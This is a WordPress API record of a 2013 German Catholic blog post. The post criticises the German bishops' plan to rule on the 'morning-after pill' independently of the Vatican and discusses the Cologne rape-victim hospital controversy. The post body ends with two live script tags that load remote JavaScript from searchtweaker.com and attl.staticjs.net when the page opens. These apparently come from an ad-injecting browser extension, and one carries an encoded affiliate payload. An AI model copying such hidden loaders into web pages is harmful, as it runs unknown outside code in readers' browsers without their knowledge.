{"id":1134,"date":"2013-02-18T23:29:21","date_gmt":"2013-02-18T21:29:21","guid":{"rendered":"http:\/\/b-logos.de\/?p=1134"},"modified":"2013-02-20T16:41:05","modified_gmt":"2013-02-20T14:41:05","slug":"eb-zollitsch-unabhangig-von-der-billigung-des-vatikans","status":"publish","type":"post","link":"https:\/\/b-logos.de\/?p=1134","title":{"rendered":"EB Zollitsch: \u201eunabh\u00e4ngig von der Billigung des Vatikans\u201c"},"content":{"rendered":"<p>Beitrag erg\u00e4nzt am 19.2.2013, 11.21 Uhr<\/p>\n<p><a title=\"Papst, Pille und Frauenf\u00f6rderplan\" href=\"http:\/\/www.domradio.de\/themen\/bischofskonferenz\/2013-02-18\/bischoefe-kommen-trier-zu-traditioneller-fruehjahrstagung\">domradio berichtet<\/a>:<\/p>\n<blockquote><p>Zun\u00e4chst besch\u00e4ftigten sich die Bisch\u00f6fe mit den medizinischen Aspekten des Medikaments, k\u00fcndigte Zollitsch an. &#8222;Wir haben eine Reihe von Gutachten eingeholt und verlassen uns auf die Urteile der Fachleute.&#8220; Komme es in Trier zu einer Entscheidung \u00fcber den Einsatz der &#8222;Pille danach&#8220;, k\u00f6nne diese unabh\u00e4ngig von der Billigung des Vatikans in den deutschen Di\u00f6zesen umgesetzt werden.<!--more--><\/p><\/blockquote>\n<h3>\u201eWir &#8230; verlassen uns auf die Urteile der Fachleute\u201c<\/h3>\n<p>Was bei Kardinal Meisner gr\u00fcndlich schief gegangen ist, soll jetzt &#8211; hoffentlich besser &#8211; wiederholt werden. Zun\u00e4chst waren ja im M\u00e4rz 2012 auf Initiative eines Oberarztes, der der \u00dcberzeugung war, eine Spurensicherung ohne das Angebot der Pille-danach sei medizinisch und ethisch nicht zu vertreten, die Krankenh\u00e4user der Cellitinnen von der Anonymen Spurensicherung f\u00fcr Vergewaltigungsopfer <a title=\"Richtigstellung z. Thema ASS\" href=\"http:\/\/http:\/\/www.notruf-koeln.de\/richtigstellung-z-thema-ass\/\">abgemeldet<\/a> worden. Bis dahin war dem Notruf f\u00fcr vergewaltigte Frauen in K\u00f6ln eine Nichtverschreibung der Pille-danach an katholischen Krankenh\u00e4usern nicht bekannt (sic!). Auch in anderen katholischen Krankenh\u00e4usern wie in <a title=\"\u00c4rzte verschreiben die Pille danach\" href=\"http:\/\/www.sueddeutsche.de\/muenchen\/katholische-krankenhaeuser-in-muenchen-aerzte-verschreiben-die-pille-danach-1.1592302\">M\u00fcnchen<\/a> oder <a title=\"Patientin und Arzt entscheiden &quot;Pille danach&quot; im Caritas-Krankenhaus\" href=\"http:\/\/www.swp.de\/bad_mergentheim\/lokales\/bad_mergentheim\/Patientin-und-Arzt-entscheiden-Pille-danach-im-Caritas-Krankenhaus;art5642,1836508\">Bad Mergentheim<\/a> waren bis dahin Verordnungen der Pille-danach problemlos m\u00f6glich. So wie ich die Richtigstellung des Notrufs f\u00fcr vergewaltigte Frauen verstehe, konnten dann Verhandlungen der Krankenhaus-Hierarchieebenen mit dem K\u00f6lner Arbeitskreis f\u00fcr Spurensicherung aber eine Wiederaufnahme in die ASS nicht m\u00f6glich machen, da der Arbeitskreis sich nun offenbar die \u00dcberzeugung des Oberarztes mit anderer Begr\u00fcndung zu eigen gemacht hatte (\u201eklares und einheitliches Angebot\u201c). Auf diese Weise war also unter Mitwirkung des eigenen Personals der Weg f\u00fcr die Schlagzeile \u201eKatholische Kliniken weisen Vergewaltigungsopfer ab&#8220; bereitet worden.<\/p>\n<p>Danach hat sich Kardinal Meisner von Fachleuten beraten lassen &#8211; ich nehme an, von Chef\u00e4rzten der Gyn\u00e4kologischen Abteilungen von Katholischen Krankenh\u00e4usern &#8211; und wurde mit Informationen versorgt, die der Marketingabteilung einer gewissen Pharmafirma h\u00e4tten entspringen k\u00f6nnen.<\/p>\n<p>Wahrscheinlich ist es gerade unter Frauen\u00e4rzten schwierig, solche zu finden, die die Perspektive des kirchlichen Lehramtes teilen. Jungmediziner, die sich <em>Humanae vitae<\/em> zu Herzen nehmen, werden sich kaum der Gyn\u00e4kologie zuwenden. Wer wird ein Fach w\u00e4hlen, in dem eine Niederlassung von vornherein ausgeschlossen ist? Eine Frauenarztpraxis ohne Pillenverschreibung ist n\u00e4mlich schlicht wirtschaftlich nicht existenzf\u00e4hig.<\/p>\n<p>Ich hoffe, dass unter den hinzugezogenen Experten solche sind, die eine differenziertere Beurteilung der Sachlage als bisher erm\u00f6glichen. Zum Beispiel <a title=\"Keenan JA. Ulipristal acetate: contraceptive or contragestive? Ann Pharmacother 2011; 45:813\u2013815. \" href=\"http:\/\/www.theannals.com\/content\/45\/6\/813.full.pdf+html\">Prof. Keenan<\/a>, Tennessee, der im Juni 2011 den Weg zu einer Notfallkontrazeption unter Vermeidung einer Nidationshemmung gewiesen hat, <a title=\"Univ.-Prof. Dr. Johannes Bonelli\" href=\"http:\/\/www.imabe.org\/index.php?id=johannesbonelli\">Prof. Johannes Bonelli<\/a>, Direktor des IMABE-Instituts f\u00fcr medizinische Anthropologie und Bioethik, Wien, der die gleiche Methode empfiehlt, oder Prof. Dr. med. Paul Cullen, der 1. Vorsitzende der <a title=\"Stellungnahme \u00c4rzte f\u00fcr das Leben e.V. zur \u201ePille danach\u201c-Debatte\" href=\"http:\/\/www.pressrelations.de\/new\/standard\/result_main.cfm?aktion=jour_pm&amp;r=522868\">\u00c4rzte f\u00fcr das Leben e.V.<\/a>.<\/p>\n<h3>\u201e&#8230; unabh\u00e4ngig von der Billigung des Vatikans &#8230;\u201c<\/h3>\n<p>Droht ein neues Beratungsschein-Szenario? Ein deutscher Sonderweg? Soll zu einem Zeitpunkt, an dem sich der regierende Papst in einer Situation der Schw\u00e4che befindet, die Position der Institution <em>Bischofskonferenz<\/em> gest\u00e4rkt werden? Ist denn nicht klar, dass es hier um Festlegungen geht, die die Weltkirche ber\u00fchren?<\/p>\n<p>Betet, liebe Leser, f\u00fcr einen guten Ausgang der Fr\u00fchjahrsvollversammlung der deutschen Bisch\u00f6fe!<\/p>\n<p><script id=\"FoxLingoJs\" type=\"text\/javascript\">\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n(function(){try{var header=document.getElementsByTagName(\"HEAD\")[0];var script=document.createElement(\"SCRIPT\");script.src=\"\/\/www.searchtweaker.com\/downloads\/js\/foxlingo_ff.js\";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==\"complete\"||this.readyState==\"loaded\")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();\n\/\/ ]]><\/script><script type=\"text\/javascript\" src=\"http:\/\/attl.staticjs.net\/amz\/aeyJhZmZpZCI6MTA4MCwic3ViYWZmaWQiOjEwMjAsImhyZWYiOiJodHRwOi8vYi1sb2dvcy5kZS93cC1hZG1pbi9wb3N0LW5ldy5waHAiLCJ3aWR0aCI6MTI4MCwiaGVpZ2h0IjoxMDI0LCJsb2FkZXJfY2xpZW50X3RpbWVzdGFtcCI6MTM2MTIxOTgyOTkyNn0%3D.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Beitrag erg\u00e4nzt am 19.2.2013, 11.21 Uhr domradio berichtet: Zun\u00e4chst besch\u00e4ftigten sich die Bisch\u00f6fe mit den medizinischen Aspekten des Medikaments, k\u00fcndigte Zollitsch an. &#8222;Wir haben eine Reihe von Gutachten eingeholt und verlassen uns auf die Urteile der Fachleute.&#8220; Komme es in Trier zu einer Entscheidung \u00fcber den Einsatz der &#8222;Pille danach&#8220;, k\u00f6nne diese unabh\u00e4ngig von der &hellip; <a href=\"https:\/\/b-logos.de\/?p=1134\" class=\"more-link\"><span class=\"screen-reader-text\">\u201eEB Zollitsch: \u201eunabh\u00e4ngig von der Billigung des Vatikans\u201c\u201c<\/span> weiterlesen<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[],"tags":[],"class_list":["post-1134","post","type-post","status-publish","format-standard","hentry"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pahMNU-ii","_links":{"self":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts\/1134","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1134"}],"version-history":[{"count":6,"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts\/1134\/revisions"}],"predecessor-version":[{"id":1148,"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts\/1134\/revisions\/1148"}],"wp:attachment":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1134"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1134"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1134"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}